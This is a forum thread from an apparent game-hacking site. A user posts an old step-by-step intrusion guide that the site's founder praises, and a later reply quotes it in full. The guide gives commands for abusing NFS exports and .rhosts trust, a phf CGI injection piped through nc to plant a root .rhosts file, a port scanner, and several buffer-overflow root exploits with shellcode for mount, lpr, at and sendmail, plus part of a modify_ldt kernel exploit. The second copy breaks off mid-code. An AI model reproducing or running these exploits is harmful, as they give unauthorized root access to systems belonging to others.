The place where the best programmers and game hackers come. The best programs and game hacks are here on PRO HAX BASE
 
HomeCalendarFAQSearchMemberlistUsergroupsRegisterLog in

Share | 
 

 Hacking a website only peoplein this forum will know

Go down 
AuthorMessage
NegativeInfluence
Noob
Noob
avatar

Posts : 18
Join date : 2010-08-06

PostSubject: Hacking a website only peoplein this forum will know   Sat Aug 14, 2010 1:37 am

Hacking step by step User's guide __________________________ Well, howdi folks... I guess you are all wondering who's this guy (me)
that's trying to show you a bit of everything... ?
Well, I ain't telling you anything of that...
Copyright, and other stuff like this (below).

Copyright and stuff...________________ If you feel offended by this subject (hacking) or you think that you could
do better, don't read the below information...
This file is for educational purposes ONLY...
I ain't responsible for any damages you made after reading this...(I'm very
serious...)
So this can be copied, but not modified (send me the changes, and if they
are good, I'll include them ).
Don't read it, 'cuz it might be illegal.
I warned you...
If you would like to continue, press <PgDown>.

Intro: Hacking step by step. _________________________________________________________________________________ Well, this ain't exactely for begginers, but it'll have to do. What all hackers has to know is that there are 4 steps in hacking... Step 1: Getting access to site.
Step 2: Hacking r00t.
Step 3: Covering your traces.
Step 4: Keeping that account.

Ok. In the next pages we'll see exactely what I ment. Step 1: Getting access. _______ Well folks, there are several methods to get access to a site.
I'll try to explain the most used ones.
The first thing I do is see if the system has an export list:

mysite:~>/usr/sbin/showmount -e victim.site.com RPC: Program not registered. If it gives a message like this one, then it's time to search another way
in.
What I was trying to do was to exploit an old security problem by most
SUN OS's that could allow an remote attacker to add a .rhosts to a users
home directory... (That was possible if the site had mounted their home
directory.
Let's see what happens...

mysite:~>/usr/sbin/showmount -e victim1.site.com /usr victim2.site.com /home (everyone)
/cdrom (everyone)
mysite:~>mkdir /tmp/mount
mysite:~>/bin/mount -nt nfs victim1.site.com:/home /tmp/mount/
mysite:~>ls -sal /tmp/mount

total 9 1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./ 1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../ 1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18 at1/ 1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/ 1 drwxrx-r-x 3 john 100 1024 Jul 6 13:42 john/ 1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 paul/ 1 -rw------- 1 root root 242 Mar 9 1997 sudoers 1 drwx------ 3 test 100 1024 Oct 8 21:05 test/ 1 drwx------ 15 102 100 1024 Oct 20 18:57 rapper/ Well, we wanna hack into rapper's home.
mysite:~>id
uid=0 euid=0
mysite:~>whoami
root
mysite:~>echo "rapper::102:2::/tmp/mount:/bin/csh" >> /etc/passwd

We use /bin/csh 'cuz bash leaves a (Damn!) .bash_history and you might forget it on the remote server... mysite:~>su - rapper
Welcome to rapper's user.
mysite:~>ls -lsa /tmp/mount/

total 9 1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./ 1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../ 1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18 at1/ 1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/ 1 drwxrx-r-x 3 john 100 1024 Jul 6 13:42 john/ 1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 paul/ 1 -rw------- 1 root root 242 Mar 9 1997 sudoers 1 drwx------ 3 test 100 1024 Oct 8 21:05 test/ 1 drwx------ 15 rapper daemon 1024 Oct 20 18:57 rapper/ So we own this guy's home directory... mysite:~>echo "+ +" > rapper/.rhosts
mysite:~>cd /
mysite:~>rlogin victim1.site.com
Welcome to Victim.Site.Com.
SunOs ver....(crap).
victim1:~$

This is the first method...
Another method could be to see if the site has an open 80 port. That would
mean that the site has a web page.
(And that's very bad, 'cuz it usually it's vulnerable).
Below I include the source of a scanner that helped me when NMAP wasn't written.
(Go get it at http://www.dhp.com/~fyodor. Good job, Fyodor).
NMAP is a scanner that does even stealth scanning, so lots of systems won't
record it.

/* -*-C-*- tcpprobe.c */
/* tcpprobe - report on which tcp ports accept connections */
/* IO ERROR, error@axs.net, Sep 15, 1995 */

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <netdb.h>
#include <signal.h>

int main(int argc, char **argv) {
int probeport = 0;
struct hostent *host;
int err, i, net;
struct sockaddr_in sa;

if (argc != 2) {
printf("Usage: %s hostname\n", argv[0]);
exit(1);

}for (i = 1; i < 1024; i++) { strncpy((char *)&sa, "", sizeof sa);
sa.sin_family = AF_INET;
if (isdigit(*argv[1]))

sa.sin_addr.s_addr = inet_addr(argv[1]); else if ((host = gethostbyname(argv[1])) != 0) strncpy((char *)&sa.sin_addr, (char *)host->h_addr, sizeof sa.sin_addr); else {
herror(argv[1]);
exit(2);

}sa.sin_port = htons(i); net = socket(AF_INET, SOCK_STREAM, 0); if (net < 0) {
perror("\nsocket");
exit(2);

}err = connect(net, (struct sockaddr *) &sa, sizeof sa); if (err < 0) {
printf("%s %-5d %s\r", argv[1], i, strerror(errno));
fflush(stdout);

} else { printf("%s %-5d accepted. \n", argv[1], i);
if (shutdown(net, 2) < 0) {
perror("\nshutdown");
exit(2);
}

}close(net); }printf(" \r");
fflush(stdout);
return (0);
}
Well, now be very carefull with the below exploits, because they usually get
logged.
Besides, if you really wanna get a source file from /cgi-bin/ use this
sintax : lynx http://www.victim1.com//cgi-bin/finger
If you don't wanna do that, then do a :

mysite:~>echo "+ +" > /tmp/rhosts mysite:~>echo "GET /cgi-bin/phf?Qalias=x%0arcp+phantom@mysite.com:/tmp/rhosts+ /root/.rhosts" | nc -v - 20 victim1.site.com 80 then
mysite:~>rlogin -l root victim1.site.com
Welcome to Victim1.Site.Com.
victim1:~#

Or, maybe, just try to find out usernames and passwords...
The usual users are "test", "guest", and maybe the owner of the site...
I usually don't do such things, but you can...

Or if the site is really old, use that (quote site exec) old bug for
wu.ftpd.
There are a lot of other exploits, like the remote exploits (innd, imap2,
pop3, etc...) that you can find at rootshell.connectnet.com or at
dhp.com/~fyodor.

Enough about this topic. (besides, if you can finger the site, you can
figgure out usernames and maybe by guessing passwords (sigh!) you could get
access to the site).

Step 2: Hacking r00t. ______ First you have to find the system it's running...
a). LINUX
ALL versions:
A big bug for all linux versions is mount/umount and (maybe) lpr.

/* Mount Exploit for Linux, Jul 30 1996 :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ::::::::""`````""::::::""`````""::"```":::'"```'.g$$S$' `````````""::::::::: :::::'.g#S$$"$$S#n. .g#S$$"$$S#n. $$$S#s s#S$$$ $$$$S". $$$$$$"$$S#n.`:::::: :::::$$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$.g#S$$$ $$$$$$ $$$$$$:::::: :::::$$$$$$gggggg$$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$:::::: :::::$$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$:::::: :::::$$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$:::::: :::::$$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$:::::: ::::::`S$$$$s$$$$S' `S$$$$s$$$$S' `S$$$$s$$$$S' $$$$$$$ $$$$$$ $$$$$$:::::: :::::::...........:::...........:::...........::.......:......:.......:::::: :::::::::::::::::::::::::::::::::::::::::::::::;:::::::::::::::::::::::::::: Discovered and Coded by Bloodmask & Vio
Covin Security 1996
*/

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/stat.h>

#define PATH_MOUNT "/bin/mount"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp() { __asm__("movl %esp, %eax"); }main(int argc, char **argv) { u_char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;

int i; int ofs = DEFAULT_OFFSET; buff = malloc(4096);
if(!buff)
{

printf("can't allocate memory\n"); exit(0); }ptr = buff; /* fill start of buffer with nops */ memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell);
/* stick asm code into the buffer */
for(i=0;i < strlen(execshell);i++)

*(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (8/4);i++) *(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr = 0;

(void)alarm((u_int)0);
printf("Discovered and Coded by Bloodmask and Vio, Covin 1996\n");
execl(PATH_MOUNT, "mount", buff, NULL);

} /*LPR exploit:I don't know the author...*/ #include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define DEFAULT_OFFSET 50 #define BUFFER_SIZE 1023 long get_esp(void) { __asm__("movl %esp,%eax\n"); }void main() {
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;

u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07" "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12" "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8" "\xd7\xff\xff\xff/bin/sh";
int i; buff = malloc(4096);
if(!buff)
{

printf("can't allocate memory\n"); exit(0); }ptr = buff; memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);
for(i=0;i < strlen(execshell);i++)

*(ptr++) = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i<2;i++)

*(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
ptr = (char *)addr_ptr;
*ptr = 0;
execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);

}b.) Version's 1.2.* to 1.3.2 NLSPATH env. variable exploit: /* It's really annoying for users and good for me...
AT exploit gives only uid=0 and euid=your_usual_euid.
*/
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/stat.h>

#define path "/usr/bin/at"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp() { __asm__("movl %esp, %eax"); }main(int argc, char **argv) { u_char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;

int i; int ofs = DEFAULT_OFFSET; buff = malloc(4096);
if(!buff)
{

printf("can't allocate memory\n"); exit(0); }ptr = buff; memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (8/4);i++) *(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr = 0;

(void)alarm((u_int)0);
printf("AT exploit discovered by me, _PHANTOM_ in 1997.\n");
setenv("NLSPATH",buff,1);
execl(path, "at",NULL);

}SENDMAIL exploit: (don't try to chmod a-s this one... ) /* SENDMAIL Exploit for Linux */#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/stat.h>

#define path "/usr/bin/sendmail"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp() { __asm__("movl %esp, %eax"); }main(int argc, char **argv) { u_char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff./sh";

char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;

int i; int ofs = DEFAULT_OFFSET; buff = malloc(4096);
if(!buff)
{

printf("can't allocate memory\n"); exit(0); }ptr = buff; memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (8/4);i++) *(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr = 0;

(void)alarm((u_int)0);
printf("SENDMAIL exploit discovered by me, _PHANTOM_ in 1997\n");
setenv("NLSPATH",buff,1);
execl(path, "sendmail",NULL);

} MOD_LDT exploit (GOD, this one gave such a headache to my Sysadmin (ROOT) !!!) /* this is a hack of a hack. a valid System.map was needed to get this sploit to werk.. but not any longer.. This sploit will give you root if the modify_ldt bug werks.. which I beleive it does in any kernel before 1.3.20 ..
QuantumG */ /* original code written by Morten Welinder. ** this required 2 hacks to work on the 1.2.13 kernel that I've tested on: * 1. asm/sigcontext.h does not exist on 1.2.13 and so it is removed.
* 2. the _task in the System.map file has no leading underscore.
* I am not sure at what point these were changed, if you are
* using this on a newer kernel compile with NEWERKERNEL defined.
*

-ReD */ #include <linux/ldt.h>
#include <stdio.h>
#include <linux/unistd.h>
#include <signal.h>
#ifdef NEWERKERNEL
#include <asm/sigcontext.h>
#endif
#define __KERNEL__
#include <linux/sched.h>
#include <linux/module.h>

static inline _syscall1(int,get_kernel_syms,struct kernel_sym *,table);
static inline _syscall3(int, modify_ldt, int, func, void *, ptr, unsigned long,
bytecount)

#define KERNEL_BASE 0xc0000000
/*------------------------------------------------------------------------ */
static __inline__ unsigned char
__farpeek (int seg, unsigned ofs)
{

unsigned char res; asm ("mov %w1,%%gs ; gs; movb (%2),%%al"
: "=a" (res)
: "r" (seg), "r" (ofs));

return res; }/*------------------------------------------------------------------------ */ static __inline__ void
__farpoke (int seg, unsigned ofs, unsigned char b)
{

asm ("mov %w0,%%gs ; gs; movb %b2,(%1)"
: /* No results. */
: "r" (seg), "r" (ofs), "r" (b));

}/*------------------------------------------------------------------------ */ void memgetseg (void *dst, int seg, const void *src, int size) { while (size-- > 0) *(char *)dst++ = __farpeek (seg, (unsigned)(src++)); }/*------------------------------------------------------------------------ */ void
memputseg (int seg, void *dst, const void *src, int size)
{

while (size-- > 0) __farpoke (seg, (unsigned)(dst++), *(char *)src++); }/*------------------------------------------------------------------------ */ int main () {
int stat, i,j,k;
struct modify_ldt_ldt_s ldt_entry;
FILE *syms;
char line[100];
struct task_struct **task, *taskptr, thistask;
struct kernel_sym blah[4096];

printf ("Bogusity checker for modify_ldt system call.\n"); printf ("Testing for page-size limit bug...\n");
ldt_entry.entry_number = 0;
ldt_entry.base_addr = 0xbfffffff;
ldt_entry.limit = 0;
ldt_entry.seg_32bit = 1;
ldt_entry.contents = MODIFY_LDT_CONTENTS_DATA;
ldt_entry.read_exec_only = 0;
ldt_entry.limit_in_pages = 1;
ldt_entry.seg_not_present = 0;
stat = modify_ldt (1, &ldt_entry, sizeof (ldt_entry));
if (stat)

/* Continue after reporting error. */ printf ("This bug has been fixed in your kernel.\n"); else {
printf ("Shit happens: ");
printf ("0xc0000000 - 0xc0000ffe is accessible.\n");

} printf ("Testing for expand-down limit bug...\n");
ldt_entry.base_addr = 0x00000000;
ldt_entry.limit = 1;
ldt_entry.contents = MODIFY_LDT_CONTENTS_STACK;
ldt_entry.limit_in_pages = 0;
stat = modify_ldt (1, &ldt_entry, sizeof (ldt_entry));
if (stat)

{
printf ("This bug has been fixed in your kernel.\n");
return 1;

} else { printf ("Shit happens: ");
Back to top Go down
View user profile
Tobi
Founder
Founder
avatar

Posts : 168
Join date : 2010-07-14
Location : Behind you!

PostSubject: Re: Hacking a website only peoplein this forum will know   Sat Aug 14, 2010 3:49 pm

I had to move this topic to the tutorials. Also nice tutorial Wink
Back to top Go down
View user profile http://prohaxbase.heavenforum.com
NegativeInfluence
Noob
Noob
avatar

Posts : 18
Join date : 2010-08-06

PostSubject: Thanks   Sun Aug 15, 2010 2:58 am

it took a few days but i dont think im a noob now can i get promoted.
Back to top Go down
View user profile
Tobi
Founder
Founder
avatar

Posts : 168
Join date : 2010-07-14
Location : Behind you!

PostSubject: Re: Hacking a website only peoplein this forum will know   Sun Aug 15, 2010 1:20 pm

NegativeInfluence wrote:
it took a few days but i dont think im a noob now can i get promoted.
I guess u can be. Also on 25 posts u become beginner member. Anyways u already know the most simple way to get the SPECIAL rank.
Back to top Go down
View user profile http://prohaxbase.heavenforum.com
x-Pain-x
SPECIAL
SPECIAL
avatar

Posts : 115
Join date : 2010-07-30
Age : 21
Location : Your house.

PostSubject: Re: Hacking a website only peoplein this forum will know   Mon Aug 16, 2010 10:06 pm

NegativeInfluence wrote:
Hacking step by step User's guide __________________________ Well, howdi folks... I guess you are all wondering who's this guy (me)
that's trying to show you a bit of everything... ?
Well, I ain't telling you anything of that...
Copyright, and other stuff like this (below).

Copyright and stuff...________________ If you feel offended by this subject (hacking) or you think that you could
do better, don't read the below information...
This file is for educational purposes ONLY...
I ain't responsible for any damages you made after reading this...(I'm very
serious...)
So this can be copied, but not modified (send me the changes, and if they
are good, I'll include them ).
Don't read it, 'cuz it might be illegal.
I warned you...
If you would like to continue, press <PgDown>.

Intro: Hacking step by step. _________________________________________________________________________________ Well, this ain't exactely for begginers, but it'll have to do. What all hackers has to know is that there are 4 steps in hacking... Step 1: Getting access to site.
Step 2: Hacking r00t.
Step 3: Covering your traces.
Step 4: Keeping that account.

Ok. In the next pages we'll see exactely what I ment. Step 1: Getting access. _______ Well folks, there are several methods to get access to a site.
I'll try to explain the most used ones.
The first thing I do is see if the system has an export list:

mysite:~>/usr/sbin/showmount -e victim.site.com RPC: Program not registered. If it gives a message like this one, then it's time to search another way
in.
What I was trying to do was to exploit an old security problem by most
SUN OS's that could allow an remote attacker to add a .rhosts to a users
home directory... (That was possible if the site had mounted their home
directory.
Let's see what happens...

mysite:~>/usr/sbin/showmount -e victim1.site.com /usr victim2.site.com /home (everyone)
/cdrom (everyone)
mysite:~>mkdir /tmp/mount
mysite:~>/bin/mount -nt nfs victim1.site.com:/home /tmp/mount/
mysite:~>ls -sal /tmp/mount

total 9 1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./ 1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../ 1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18 at1/ 1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/ 1 drwxrx-r-x 3 john 100 1024 Jul 6 13:42 john/ 1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 paul/ 1 -rw------- 1 root root 242 Mar 9 1997 sudoers 1 drwx------ 3 test 100 1024 Oct 8 21:05 test/ 1 drwx------ 15 102 100 1024 Oct 20 18:57 rapper/ Well, we wanna hack into rapper's home.
mysite:~>id
uid=0 euid=0
mysite:~>whoami
root
mysite:~>echo "rapper::102:2::/tmp/mount:/bin/csh" >> /etc/passwd

We use /bin/csh 'cuz bash leaves a (Damn!) .bash_history and you might forget it on the remote server... mysite:~>su - rapper
Welcome to rapper's user.
mysite:~>ls -lsa /tmp/mount/

total 9 1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./ 1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../ 1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18 at1/ 1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/ 1 drwxrx-r-x 3 john 100 1024 Jul 6 13:42 john/ 1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 paul/ 1 -rw------- 1 root root 242 Mar 9 1997 sudoers 1 drwx------ 3 test 100 1024 Oct 8 21:05 test/ 1 drwx------ 15 rapper daemon 1024 Oct 20 18:57 rapper/ So we own this guy's home directory... mysite:~>echo "+ +" > rapper/.rhosts
mysite:~>cd /
mysite:~>rlogin victim1.site.com
Welcome to Victim.Site.Com.
SunOs ver....(crap).
victim1:~$

This is the first method...
Another method could be to see if the site has an open 80 port. That would
mean that the site has a web page.
(And that's very bad, 'cuz it usually it's vulnerable).
Below I include the source of a scanner that helped me when NMAP wasn't written.
(Go get it at http://www.dhp.com/~fyodor. Good job, Fyodor).
NMAP is a scanner that does even stealth scanning, so lots of systems won't
record it.

/* -*-C-*- tcpprobe.c */
/* tcpprobe - report on which tcp ports accept connections */
/* IO ERROR, error@axs.net, Sep 15, 1995 */

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <netdb.h>
#include <signal.h>

int main(int argc, char **argv) {
int probeport = 0;
struct hostent *host;
int err, i, net;
struct sockaddr_in sa;

if (argc != 2) {
printf("Usage: %s hostname\n", argv[0]);
exit(1);

}for (i = 1; i < 1024; i++) { strncpy((char *)&sa, "", sizeof sa);
sa.sin_family = AF_INET;
if (isdigit(*argv[1]))

sa.sin_addr.s_addr = inet_addr(argv[1]); else if ((host = gethostbyname(argv[1])) != 0) strncpy((char *)&sa.sin_addr, (char *)host->h_addr, sizeof sa.sin_addr); else {
herror(argv[1]);
exit(2);

}sa.sin_port = htons(i); net = socket(AF_INET, SOCK_STREAM, 0); if (net < 0) {
perror("\nsocket");
exit(2);

}err = connect(net, (struct sockaddr *) &sa, sizeof sa); if (err < 0) {
printf("%s %-5d %s\r", argv[1], i, strerror(errno));
fflush(stdout);

} else { printf("%s %-5d accepted. \n", argv[1], i);
if (shutdown(net, 2) < 0) {
perror("\nshutdown");
exit(2);
}

}close(net); }printf(" \r");
fflush(stdout);
return (0);
}
Well, now be very carefull with the below exploits, because they usually get
logged.
Besides, if you really wanna get a source file from /cgi-bin/ use this
sintax : lynx http://www.victim1.com//cgi-bin/finger
If you don't wanna do that, then do a :

mysite:~>echo "+ +" > /tmp/rhosts mysite:~>echo "GET /cgi-bin/phf?Qalias=x%0arcp+phantom@mysite.com:/tmp/rhosts+ /root/.rhosts" | nc -v - 20 victim1.site.com 80 then
mysite:~>rlogin -l root victim1.site.com
Welcome to Victim1.Site.Com.
victim1:~#

Or, maybe, just try to find out usernames and passwords...
The usual users are "test", "guest", and maybe the owner of the site...
I usually don't do such things, but you can...

Or if the site is really old, use that (quote site exec) old bug for
wu.ftpd.
There are a lot of other exploits, like the remote exploits (innd, imap2,
pop3, etc...) that you can find at rootshell.connectnet.com or at
dhp.com/~fyodor.

Enough about this topic. (besides, if you can finger the site, you can
figgure out usernames and maybe by guessing passwords (sigh!) you could get
access to the site).

Step 2: Hacking r00t. ______ First you have to find the system it's running...
a). LINUX
ALL versions:
A big bug for all linux versions is mount/umount and (maybe) lpr.

/* Mount Exploit for Linux, Jul 30 1996 :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ::::::::""`````""::::::""`````""::"```":::'"```'.g$$S$' `````````""::::::::: :::::'.g#S$$"$$S#n. .g#S$$"$$S#n. $$$S#s s#S$$$ $$$$S". $$$$$$"$$S#n.`:::::: :::::$$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$.g#S$$$ $$$$$$ $$$$$$:::::: :::::$$$$$$gggggg$$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$:::::: :::::$$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$:::::: :::::$$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$:::::: :::::$$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$:::::: ::::::`S$$$$s$$$$S' `S$$$$s$$$$S' `S$$$$s$$$$S' $$$$$$$ $$$$$$ $$$$$$:::::: :::::::...........:::...........:::...........::.......:......:.......:::::: :::::::::::::::::::::::::::::::::::::::::::::::;:::::::::::::::::::::::::::: Discovered and Coded by Bloodmask & Vio
Covin Security 1996
*/

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/stat.h>

#define PATH_MOUNT "/bin/mount"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp() { __asm__("movl %esp, %eax"); }main(int argc, char **argv) { u_char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;

int i; int ofs = DEFAULT_OFFSET; buff = malloc(4096);
if(!buff)
{

printf("can't allocate memory\n"); exit(0); }ptr = buff; /* fill start of buffer with nops */ memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell);
/* stick asm code into the buffer */
for(i=0;i < strlen(execshell);i++)

*(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (8/4);i++) *(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr = 0;

(void)alarm((u_int)0);
printf("Discovered and Coded by Bloodmask and Vio, Covin 1996\n");
execl(PATH_MOUNT, "mount", buff, NULL);

} /*LPR exploit:I don't know the author...*/ #include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define DEFAULT_OFFSET 50 #define BUFFER_SIZE 1023 long get_esp(void) { __asm__("movl %esp,%eax\n"); }void main() {
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;

u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07" "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12" "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8" "\xd7\xff\xff\xff/bin/sh";
int i; buff = malloc(4096);
if(!buff)
{

printf("can't allocate memory\n"); exit(0); }ptr = buff; memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);
for(i=0;i < strlen(execshell);i++)

*(ptr++) = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i<2;i++)

*(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
ptr = (char *)addr_ptr;
*ptr = 0;
execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);

}b.) Version's 1.2.* to 1.3.2 NLSPATH env. variable exploit: /* It's really annoying for users and good for me...
AT exploit gives only uid=0 and euid=your_usual_euid.
*/
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/stat.h>

#define path "/usr/bin/at"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp() { __asm__("movl %esp, %eax"); }main(int argc, char **argv) { u_char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;

int i; int ofs = DEFAULT_OFFSET; buff = malloc(4096);
if(!buff)
{

printf("can't allocate memory\n"); exit(0); }ptr = buff; memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (8/4);i++) *(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr = 0;

(void)alarm((u_int)0);
printf("AT exploit discovered by me, _PHANTOM_ in 1997.\n");
setenv("NLSPATH",buff,1);
execl(path, "at",NULL);

}SENDMAIL exploit: (don't try to chmod a-s this one... ) /* SENDMAIL Exploit for Linux */#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/stat.h>

#define path "/usr/bin/sendmail"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp() { __asm__("movl %esp, %eax"); }main(int argc, char **argv) { u_char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff./sh";

char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;

int i; int ofs = DEFAULT_OFFSET; buff = malloc(4096);
if(!buff)
{

printf("can't allocate memory\n"); exit(0); }ptr = buff; memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (8/4);i++) *(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr = 0;

(void)alarm((u_int)0);
